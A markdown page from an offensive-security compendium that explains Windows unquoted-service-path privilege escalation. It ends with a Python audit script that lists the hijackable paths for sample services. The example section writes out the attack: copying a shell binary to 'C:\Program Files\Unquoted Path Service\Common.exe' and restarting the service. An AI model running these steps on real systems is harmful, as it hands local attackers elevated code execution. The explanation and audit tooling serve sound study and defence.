killchain-compendium/exploit/windows/docs/unquoted_path.md


Unquoted Path

  • A service whose binary path contains spaces but is not enclosed in quotes can be hijacked: an executable planted at one of the intermediate paths gets started instead of the real service binary.
  • For that to work, some directory along the path must be writable by the attacker. Windows resolves an unquoted path by trying each space-delimited prefix in turn with .exe appended, so every space in the path is a potential hijack point.
  • List services and their binary paths with wmic service get name,displayname,pathname,startmode, and inspect a single service with sc qc <servicename>.
  • Check permissions on the directories along the path with .\accesschk64.exe /accepteula -uwdq "C:\Service Path\"

Example

  • The unquoted path is C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe, so the prefix C:\Program Files\Unquoted Path Service\Common is tried as Common.exe before the real binary:
copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
net start <service>
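As an added audit helper (not part of the compendium), the script below takes a service binary path as shown by sc qc or wmic and lists every file Windows would try to start before the intended executable, grouped into the directories to check with accesschk. The sample services are constructed; the function names are my own.

```python
"""Audit helper for unquoted service paths (added example).

Given a service binary path, list every file Windows would try before the
intended executable. The parent directory of each candidate is what to check
with accesschk: a writable one lets a local user plant a binary there.
"""
import ntpath  # Windows path rules, so this also runs on non-Windows hosts


def hijack_candidates(pathname: str) -> list:
    """Return the paths tried, in order, before the real binary is reached.

    Mirrors CreateProcess behaviour: an unquoted command line is split at
    spaces, each growing prefix is tried, and ".exe" is appended when the
    prefix has no extension. A quoted path or one without spaces is safe.
    """
    pathname = pathname.strip()
    if pathname.startswith('"') or " " not in pathname:
        return []
    tokens = pathname.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        ext = ntpath.splitext(prefix)[1].lower()
        if ext == ".exe":
            break  # reached the intended executable; arguments follow
        candidates.append(prefix if ext else prefix + ".exe")
    return candidates


def directories_to_check(candidates: list) -> list:
    """Unique parent directories of the candidates, for accesschk -uwdq."""
    return sorted({ntpath.dirname(c) for c in candidates}, key=str.lower)


def audit(services: list) -> dict:
    """Map each vulnerable service name to its hijack candidates."""
    result = {}
    for svc in services:
        cands = hijack_candidates(svc["pathname"])
        if cands:
            result[svc["name"]] = cands
    return result


# Constructed sample, in the shape of wmic service get name,pathname output.
SAMPLE_SERVICES = [
    {"name": "UnquotedPathService",
     "pathname": r"C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe"},
    {"name": "QuotedService", "pathname": r'"C:\Program Files\Quoted Service\svc.exe"'},
    {"name": "Spooler", "pathname": r"C:\Windows\System32\spoolsv.exe"},
]

if __name__ == "__main__":
    for name, cands in audit(SAMPLE_SERVICES).items():
        print(name)
        for c in cands:
            print("  would try:", c)
        print("  check write access on:", directories_to_check(cands))
```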